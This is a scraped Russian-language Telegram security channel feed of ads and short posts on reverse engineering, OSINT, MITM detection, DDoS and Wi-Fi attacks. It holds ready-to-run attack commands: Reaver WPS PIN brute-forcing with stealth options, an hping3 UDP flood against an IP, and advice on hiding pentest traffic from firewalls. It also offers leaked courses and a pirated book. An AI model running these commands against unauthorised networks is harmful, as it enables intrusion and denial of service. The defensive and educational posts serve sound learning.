CodeGuard: CyberSec Edition

🤔 Слишком поздно заходить в IT в 2025? Врать не буду, скорее да, чем нет: за последние пять лет порог вхождения сильно поднялся, и теперь нередко от джуна требуют навыки грейдом выше. Что делать в такой ситуации? Учиться эффективнее остальных и знать, как подать себя на рынке других. Разобраться со всем этим вам поможет База Знаний — место, где за вас уже отобрали лучшие материалы по самым востребованным вакансиям: 🤖 Нейросети – 824+ материалов 🖥 Python Dev – 1558+ материалов 👩‍💻 Frontend Dev – 1241+ материалов 👩‍💻 Backend Dev – 1095+ материалов 📊 Data Scientist – 978+ материалов 🎨 UX/UI Designer – 885+ материалов 📖 Книги по IT – 779+ материалов Советую перейти и начать учиться уже сейчас — так уже через пару месяцев сможете претендовать на вакансию c хорошим окладом 👍

🤔 Продвинутый реверс-инжиниринг подозрительных исполняемых файлов — команды и практические шаги Нашли исполняемый файл с подозрительным поведением? Не спешите удалять — попробуйте проанализировать и понять, что внутри с помощью проверенных инструментов. ⭐️ Шаг 1. Запуск и загрузка файла в дизассемблер (IDA Pro, Ghidra): - Запустите IDA Pro или Ghidra - Откройте файл:

# В Ghidra: выбрать File → Import File → ваш_файл.exe

- Изучите раздел .rdata и строки: ищите подозрительные URL, команды и вызовы ⭐️ Шаг 2. Анализ структуры с помощью hex-редактора (Hiew, wxHexEditor):

hiew ваш_файл.exe

- Просмотрите первую часть, определение секций, статистику байтов - Найдите встроенные ресурсы (иконки, строки) через редактор ресурсов (Resource Hacker или XN Resource Editor) ⭐️ Шаг 3. Динамическое исследование с помощью отладчика (OllyDbg, x64dbg): - Запускайте и трассируйте подозрительные вызовы - Отслеживайте изменения в регистре, вызовы API, обработку сетевого трафика ⭐️ Шаг 4. Распаковка PyInstaller-скриптов (если применимо): - Используйте pyinstallerextractor.py

python3 pyinstxtractor.py файл.exe

⭐️ Шаг 5. Проверка поведения файла в изолированной среде (виртуальная машина, sandbox): - Следите за изменениями на диске и в реестре - Мониторинг сетевого трафика (Wireshark, tcpdump) 🛡 Полезные команды:

strings файл.exe | grep -E 'http|exec|system'
procmon # мониторинг процессов и системных событий Windows
regshot # контроль изменения реестра

😇 Подробнее Статья на Habr и Разбор на Codeby 😈 CodeGuard | Chat | #reversing #malwareanalysis #infosec

😈 Reaver — мощный инструмент для взлома Wi-Fi через WPS Reaver выполняет лобовую атаку перебором PIN-кода Wi-Fi Protected Setup (WPS), чтобы получить пароль WPA/WPA2 сети. Это позволяет взломать многие роутеры за 4–10 часов, в зависимости от точки доступа и условий сети. 🔥 Для начала атаки используйте такие команды:

# Переводим интерфейс в режим monitor
sudo airmon-ng start wlan0

# Поиск уязвимых сетей с включенным WPS
sudo wash -i wlan0mon

# Запуск Reaver по BSSID уязвимой точки доступа
sudo reaver -i wlan0mon -b <BSSID> -vv

🟫 Рекомендуемые опции для аккуратной атаки: -vv — вывод детальной информации -c <channel> — указание канала, чтобы ускорить процесс -K 1 — режим stealth, чтобы снизить вероятность блокировки -N — отключение некоторых техник, если роутер нестабилен ⏺️ Код и подробная документация 🚀 Reaver — простой и эффективный способ тестирования защиты Wi-Fi от атак через WPS. 😈 CodeGuard | Chat

💻 VPN ЛИДЕР — скорость и свобода без компромиссов Команда профессионалов разработала VPN нового поколения, объединяющий максимальную скорость и безграничный трафик. 🔹 Безлимитный доступ 🔹 Поддержка до 5 устройств 🔹 Для быстрого соединения Бесплатный пробный период на полной скорости и без ограничений. VPN ЛИДЕР — включи и наслаждайся.

⭐️ Серверные атаки через нестандартные протоколы — разбор с командами и ссылками Серверы становятся жертвами атак через протоколы и сервисы, которые обычно не находятся под пристальным мониторингом. Вот самые распространённые виды атак и как их диагностировать. 🚨 Запуск UDP Flood с порта 80 — блиц-проверка нагрузки UDP:

hping3 --udp -p 80 --flood 192.168.1.100

С этой простой команды начинается атака, которая перегружает сервер ложным трафиком. Подробнее о принципах UDP/ICMP-флудов и других DDoS-атак читайте на Хабре ⚡️ Проверка полусоединений при SYN Flood:

netstat -n | grep SYN_RECV | wc -l

Если значение растёт аномально, это признак SYN-flood атаки — сервер тонет в полусоединениях. Про реальные атаки и защиту от них – углублённый разбор по ссылке 🐾 Мониторинг TCP RST пакетов при TCP Reset Attack:

tcpdump 'tcp[tcpflags] & tcp-rst != 0'

Необычные RST-сегменты могут разрывать легитимные сессии. Про современные подходы к мониторингу и фильтрации DDoS — в блоге SimpleHacker

🛡 Защита включает в себя: — Настройку firewall с ограничениями по трафику — IDS/IPS для выявления аномалий — Патчи сетевых компонентов — Логи и регулярный анализ подозрительных пакетов

Используйте эти команды, чтобы оперативно понять, есть ли атака нестандартным протоколом, и быстро принять меры. 😈 CodeGuard | Chat | #DDoS #networksecurity #linux

🛡 [Перевод] Использование ротации IP адресов для обхода лимитов отправки одноразовых паролей (OTP) в приложении на Flutter Исследователи информационной безопасности и охотники за багами часто сталкиваются с трудностью перехвата трафика приложений на Flutter, поскольку эта технология не поддерживает системные настройки прокси. В данном материале я расскажу, каким образом я обошел данное ограничение. ➡️ Читать на хабр 😈 CodeGuard | Chat

🎉 Фестиваль «LeTeam: сквозь время и инновации»! 📅 Когда: 1 ноября 2025 (важно: это будний день!) ⏰ Расписание: - 10:00–11:00 — Регистрация и торжественное открытие - 11:00–18:00 — Интенсивная деловая программа - 18:00–22:00 — Веселое afterparty 📍 Где: Дворец Культур, Москва, ул. Шарикоподшипниковская, 15с1 🌐 Формат: Оффлайн + онлайн-трансляция Зарегистрируйтесь прямо ЗДЕСЬ! Приглашаем на второй живой фестиваль от Lenta tech — «LeTeam»! Это шанс собраться с коллегами и гостями, обменяться идеями, укрепить командные узы и зарядиться вдохновением для будущих достижений в нашей компании. Что в программе? - Доклады экспертов о ML, AI и горячих технологических трендах - Инновационные форматы выступлений и прямые ответы топ-менеджеров Lenta tech на самые острые вопросы - Развлекательная часть и крутая вечеринка для релакса и продолжения общения! Полная программа - ТУТ! LeTeam — это про людей: про встречи, внимательное слушание и общую энергию, которая толкает к новым вершинам. Ждем вас с радостью! 😊 P.S.: Остались вопросы? Пишите на LeTeamFest@yandex.ru

😈 Техники сокрытия трафика при пентесте Хотите, чтобы при пентесте трафик был незаметен и сложно анализируем? Вот подробный пошаговый разбор современных методов обфускации и сокрытия сетевого трафика. 🔥 Используйте Tor obfs4 — протокол маскировки, который скрывает сам факт использования Tor, делая трафик случайным и сложным для фильтрации:

tor --RunObfs4Proxy

Туннелируйте трафик через HTTPS с имитацией легитимных сервисов — использование Meek и domain fronting позволит маскировать атаки под обычные веб-запросы (через Google или Amazon). Это помогает пройти через многие корпоративные firewall и IPS. ⚙️ Шифруйте данные дополнительно, используя stunnel или VPN-туннели:

stunnel myconfig.conf

Применяйте динамическое изменение портов и IP (Fast Flux), чтобы усложнить фильтрацию. 🧰 Команды для проверки и настройки — Запуск Tor со скрытием протокола obfs4:

tor -f /etc/tor/torrc

— Настройка stunnel для SSL-туннелирования:

sudo apt install stunnel4
sudo nano /etc/stunnel/stunnel.conf
sudo systemctl restart stunnel4

— Перенаправление приложения через ProxyChains-NG (цепочка прокси):

proxychains4 nmap target

🚀 Советы по безопасности - Контролируйте метаданные: длину и интервалы пакетов - Используйте adaptive padding для VPN/tor - Меняйте конфигурацию на лету, чтобы избежать постоянных паттернов 😈 CodeGuard | Chat | #pentest #trafficobfuscation #infosec

🔍 Obsidian OSINT Templates (resistec) — быстрый старт для структурирования расследований Обновите свои OSINT-исследования с помощью готовых шаблонов для Obsidian — мощного приложения для заметок и связей. ⚙️ Как быстро установить и начать: 1. Клонируйте репозиторий прямо в папку ваших шаблонов Obsidian:

git clone https://github.com/resistec/obsidian-osint-templates.git /path/to/your/obsidian/vault/Templates

2. В Obsidian включите плагин Templater, настройте путь к новой папке шаблонов. 3. Создайте новую заметку и вызовите шаблон командой: Ctrl+P → введите Templater: Insert Template → выберите нужный OSINT шаблон (например, Person или Domain). 4. Заполняйте поля, связывайте записи через двойные скобки [[ ]] для построения графа расследования. 💡 Полезные команды в Obsidian для усиления OSINT: - Ctrl+P → быстрый вызов команд и шаблонов - Вставка шаблона через Templater — экономит время на рутинных данных - Используйте поиск по связям для глубокого переключения между объектами 📌 Ссылки для старта: — Репозиторий шаблонов — Официальный сайт Obsidian — Документация по плагину Templater 😈 CodeGuard | Chat | #OSINT #Obsidian #инструменты

Знаете, зачем вас набирают в Телеграме или ВК незнакомые номера? Посмотрите видео выше — насколько легко узнать IP-адрес любого юзера через звонок. Простых способов узнать о вас практически всё — сотни, и если вы хотите соблюдать хотя бы минимум сетевой гигиены — подпишитесь на @cult_security Это канал опытного айтишника, который расскажет вам всё об уловках хакеров/мошенников, а также поделится лайфхаками и инсайдами. @cult_security — ваша анонимность скажет вам «спасибо».

🌍 Web-check — рентген вашего веб-сайта Web-check — это открытый инструмент для анализа сайтов, который помогает быстро получить исчерпывающую информацию о любом веб-ресурсе. Что анализирует Web-check? ➡️IP Info ➡️ SSL цепочку сертификатов ➡️ DNS записи и TXT записи ➡️ Cookies и правила обхода (Crawl Rules) ➡️ HTTP заголовки и статус сервера ➡️ Локацию сервера и связанные хосты ➡️ Цепочку редиректов ➡️ Открытые порты и трассировку (Traceroute) ➡️ Carbon Footprint сайта (углеродный след) ➡️ Whois информацию и безопасность DNS ➡️ Особенности сайта и социальные теги ➡️ Конфигурацию электронной почты и firewall ➡️ Защиту HTTP и TLS-сертификатов ➡️ Историю архива сайта ➡️ Детектирование вредоносного ПО и фишинга ➡️ Скриншоты страницы и многое другое — Можно использовать через бесплатное API для интеграций — Исходники доступны, и сервис легко развернуть на собственном сервере 🔗 Репозиторий на GitHub 😈 CodeGuard | Chat | #OSINT #WebAnalysis #infosec

🛡 Как обнаружить и нейтрализовать MITM-атаки в домашней сети MITM (Man-in-the-Middle) — атака, при которой злоумышленник встает «посередине» вашего соединения и перехватывает, а иногда и изменяет передаваемые данные. В домашних условиях такие атаки чаще всего реализуются через ARP-спуфинг или поддельные Wi-Fi сети. 🔍 Как обнаружить MITM: ➡️1. Следите за ARP-таблицей:

arp -a

Если вы видите несколько IP с одним MAC или подозрительные изменения — возможен ARP-спуфинг. ➡️ 2. Используйте специализированные инструменты для мониторинга: - arpwatch — отслеживает появление новых MAC и изменения ARP в сети. - mitmcanary — интеллектуальный инструмент, который делает контрольные запросы и проверяет, не изменился ли трафик. ➡️ 3. Проверьте сертификаты HTTPS: Если браузер предупреждает о недействительном или измененном сертификате — это сигнал MITM. ➡️ 4. Необычная сетевая активность: Задержки, пропадание соединений или резкий рост трафика могут свидетельствовать о вмешательстве.

⚙️ Как нейтрализовать MITM: - Используйте WPA3 на роутере и меняйте пароль Wi-Fi регулярно. - Отключите WPS и UPnP на роутере — они облегчают доступ злоумышленникам. - Включите статическую ARP на критичных устройствах или используйте DHCP Snooping и Dynamic ARP Inspection, если роутер это поддерживает. - Шифруйте трафик — предпочтение HTTPS, SSH, VPN. - Используйте средства обнаружения сетевых аномалий (IDS), например Snort или Suricata. - Регулярно обновляйте прошивку роутера и ПО устройств.

📌 Пример команды постоянного мониторинга ARP в Linux:

watch -n 10 arp -a

Это позволит видеть изменения каждые 10 секунд. Безопасность домашней сети начинается с понимания угроз и проактивной защиты. Применяйте эти рекомендации и проверяйте сеть) 😈 CodeGuard | Chat | #MITM #сеть #безопасность #ARPспуфинг

⚡️ Программирование, DevOps и Linux в карточках! Ребята сделали мощный канал про разработку и инфраструктуру — короткие гайды, понятные объяснения и настоящая практика без воды: утилиты, советы и фишки, которые реально помогают в работе. Подписывайтесь: @recura_tech

🔫 Продолжаем сливать курсы по этичному хакингу и пентестингу 2024–2025 🔹 Этический хакинг с помощью Metasploit (2024)

Это практикоориентированный курс, направленный на изучение возможности платформы Metasploit для тестирования на проникновение. Включает настройку лабораторной среды с Kali Linux и Windows, отработку методов сканирования, эксплуатации уязвимостей, внедрения троянов и управления системами.

🔹 Полный курс по сетевому взлому - от начинающего до продвинутого (2024)

Освещает все этапы сетевого взлома: от базовой теории сетевых протоколов и сканирования до сложных техник обхода межсетевых экранов и эксплуатации. Используются реальные инструменты и техники, которые применяются на практике.

🔹 Освойте этичный веб-хакинг в реальном мире - XSS и SQLi (2024)

Специализированный курс для углублённого изучения атак на веб-приложения. Основное внимание уделяется XSS и SQL-инъекциям с демонстрацией практических примеров. В курсе показывается, как находить и эксплуатировать эти уязвимости, а также способы их предотвращения.

🔹 Живой баг-баунти и этический хакинг 2025 (2024)

Курс посвящён современным методам bug bounty, включая социальную инженерию, сложные техники разведки и этичные атаки. Есть упор на актуальные инструменты и кейсы из практики баг-баунти. Важен для тех, кто хочет участвовать в программах bug bounty.

🔹 Курс Мобильный хакинг и безопасность - Android и iOS (2023)

Покрывает особенности мобильной безопасности, хакерские методики для Android и iOS. От установки среды тестирования до эксплуатации реальных уязвимостей в мобильных приложениях и ОС.

⚡️ Ребята, все бесплатно для моих Сабов. Если не сложно подпишись на наш архив, там полезные ресурсы, каждый день. 😈 CodeGuard | Chat | #pentesting #ethicalhacking #infosec

💻 Библия пентестера — PENTESTING-BIBLE PENTESTING-BIBLE — это огромный репозиторий с тысячами практических заметок, гайдов и полезных ссылок по этичному хакингу и тестированию на проникновение. ⚡ Что внутри? — Чеклисты для пентестинга — Полезные и свежие ссылки на инструменты — Идеи для аудита и эксплойты из реальной практики — Руководства по сбору информации, анализу уязвимостей — Советы по нахождению и эксплуатации веб-уязвимостей — Информация для начинающих и опытных специалистов одновременно

⚙️ Для кого? - Для начинающих пентестеров, которые хотят быстро освоить базу - Для инженеров безопасности и аудиторов - Для тимлидов, которые курируют команды Red Team - Для всех, кто хочет поддерживать знания в актуальном состоянии

⚠️ Напоминаем: материалы предназначены для обучения и повышения осведомленности в вопросах безопасности. Используйте знания этично и ответственно. 📱 Репозиторий на GitHub 😈 CodeGuard | Chat | #pentesting #infosec #hacking

📘 На Stepik вышел курс — «DevOps-инженер: От основ до продакшена» Хотите автоматизировать деплой, управлять инфраструктурой как кодом и выстраивать надёжные CI/CD процессы? Этот курс — полный путь DevOps-инженера. • CI/CD: Jenkins, GitLab CI/CD, GitHub Actions, стратегии развёртывания (Blue-Green, Canary), rollback • Контейнеризация: Docker (образы, Compose, networking), Podman, оптимизация и безопасность контейнеров • Kubernetes: архитектура, Pods, Services, Deployments, Helm, RBAC, Service Mesh (Istio/Linkerd) • Infrastructure as Code: Terraform, Ansible (playbooks, vault), Packer, ArgoCD и Flux для GitOps • Облака: AWS (EC2, EKS, Lambda), GCP, Azure, Yandex Cloud, cost optimization• Мониторинг: Prometheus, Grafana, ELK Stack, Jaeger, OpenTelemetry, SLI/SLO/SLA • Безопасность: SAST/DAST, Vault, Zero Trust, Policy as Code, incident response • Продакшен практики: High Availability, Disaster Recovery, Chaos Engineering, on-call management 🎓 Сертификат — добавьте в резюме или LinkedIn 🚀 Скидка 25%, действует 48 часов 👉 Пройти курс на Stepik

🤔 Книга: «Хакерство. Физические атаки с использованием хакерских устройств» Автор: Андрей Жуков Год: 2023

Эта книга раскрывает методы физического взлома — от дампа памяти с помощью обычной флешки до атак на беспроводные сети и уличные IP-камеры с использованием самодельных хакерских устройств. Подробно описаны атаки BadUSB, организация доступа через 4G-модем, использование дронов и Wi-Fi Pineapple, а также способы защиты от этих угроз. 👨‍💻 Что внутри: - Дамп памяти и перехват трафика «крокодилами» - Атаки на Active Directory и heap-уязвимости - Взлом протекторов и создание DDos-утилит - Тестирование сетевых протоколов OSPF, EIGRP, DTP - Эксплуатация уязвимости Log4Shell - Превращение мобильного в хакерское устройство Для пентестеров и специалистов по ИБ, кто хочет расширить арсенал практических техник. 💠 Бери книгу → [Archive] 😈 CodeGuard | Chat | #book #hacking #pentest

🐳 glibc-hwcaps и GLIBC_TUNABLES: как включить x86-64-v3 для ваших CLI Обычно я за то, чтобы не усложнять рантайм лишний раз, но здесь случай приятный: можно включить у своих CLI автоматический выбор библиотек под реальные возможности CPU и не ломать обратную совместимость. Механизм называется glibc-hwcaps, появился в glibc 2.33, и он позволяет динамическому загрузчику подбирать lib’ы из специальных поддиректорий по уровню x86-64-v2/v3/v4. Это ровно те уровни, что определены в x86-64 psABI, без частных расширений конкретных вендоров. На практике достаточно положить собранный под v3 lib рядом с обычным, соблюсти SONAME, и ld.so сам подхватит оптимизированный вариант на новых процессорах. На старом железе всё продолжит работать на базовой сборке. 😵‍💫 Можно глянуть позже 😈 CodeGuard | Chat

❗️Внимание, хакеры и разработчики! У нас для вас новость и куча задач! Канал про кибербезопасность и разработку 🐞 БАГодельня запустил сайт с CTF-задачами для вашей практики! 📌 Вас ждут категории задач по: 🔹OSINT 🔹Web 🔹Misc 🔹Rev 🔹Stegano 📌 Помимо тасков, на канале вас ждут: 🔹Регулярные посты и руководства по разработке 🔹 Подробные разборы решений и ошибок 🔹 Описания алгоритмов и подходов 🔹 Код-ревью реальных проектов Всё для вашего роста в IT можно найти тут: @bug_makers

📱 Браузера, которые НЕ сливают тебя ФСБ | Выбираем браузер для хакера Твой браузер — это дыра в твоей безопасности. Пока ты читаешь это, он может передавать твои данные и создавать цифровой портрет для тебя же на убой. В этом видео я покажу тебе три типа браузеров, которые не сливают твои данные, а работают на тебя. Мы разберем главную ошибку, из-за которой вычисляют даже опытных, и я дам тебе готовую схему по созданию своей системы анонимности. 🔹https://www.youtube.com/watch?v=3c60v9ZUb2k 😈 CodeGuard | Chat